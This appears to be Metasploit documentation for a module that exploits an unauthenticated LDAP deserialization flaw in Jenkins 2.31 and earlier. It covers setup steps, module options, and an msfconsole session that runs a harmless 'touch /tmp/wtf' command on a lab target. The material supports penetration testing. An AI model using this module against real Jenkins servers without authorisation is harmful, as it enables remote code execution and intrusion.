## Vulnerable Application

Jenkins 2.31 or below is vulnerable and can be downloaded from [updates.jenkins-ci.org](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war)

This vulnerability does not require authentication and only HTTP access to the vulnerable application is required.


## Verification Steps

  1. Download [jenkins 2.31](https://updates.jenkins-ci.org/download/war/2.31/jenkins.war)
  2. Install jenkins ```java -jar jenkins.war```
  3. Start ```msfconsole```
  4. Do: ```use exploit/linux/misc/jenkins_ldap_deserialize```
  5. Do: ```set RHOST [target host]```
  6. Do: ```set PAYLOAD cmd/unix/generic```
  7. Do: ```set CMD 'touch /tmp/wtf'```
  8. Do: ```run```
  7. It should create /tmp/wtf on the target host.

## Required Options

  **RHOST**

  The address of the jenkins server.


## Options

  **RPORT**

  The http port for the jenkins server. (Defaults to 8080)

  **TARGETURI**

  The path to the target instance of Jenkins. (Defaults to /)

  **SRVHOST**

  The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)

  **SRVPORT**

  The local port to listen for the LDAP request on. (Defaults to 1389)

  **LDAPHOST**

  The ldap host the exploit will connect to. Can be different from ```SRVHOST``` if in a environment where there is port forwarding. (Defaults to 127.0.0.1)


## Scenarios

  Example usage against a unix target running Jenkins 2.31.

  ```
  msf > use exploit/linux/misc/jenkins_ldap_deserialize
  msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
  TARGETURI => /
  msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
  RHOST => 127.0.0.1
  msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
  RPORT => 8080
  msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
  PAYLOAD => cmd/unix/generic
  msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
  CMD => touch /tmp/wtf
  msf exploit(jenkins_ldap_deserialize) > run
  [*] Exploit completed, but no session was created.

  ```